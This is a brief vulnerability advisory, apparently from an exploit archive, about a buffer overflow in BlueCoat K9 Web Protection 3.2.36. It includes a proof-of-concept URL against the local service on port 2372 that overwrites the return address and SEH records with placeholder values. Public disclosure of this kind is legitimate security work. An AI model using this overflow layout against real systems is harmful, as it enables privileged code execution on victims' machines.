source: https://www.securityfocus.com/bid/24373/info K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer. An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system. K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well. CSIS.DK - BlueCoat K9 Web Protection Overflow

Discovery and Exploit by Dennis Rand - CSIS.DK


http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA]

  • Return Address = DCBA
  • Pointer to the next SEH record = BBBB
  • SE Handler = AAAA
    RUN PoC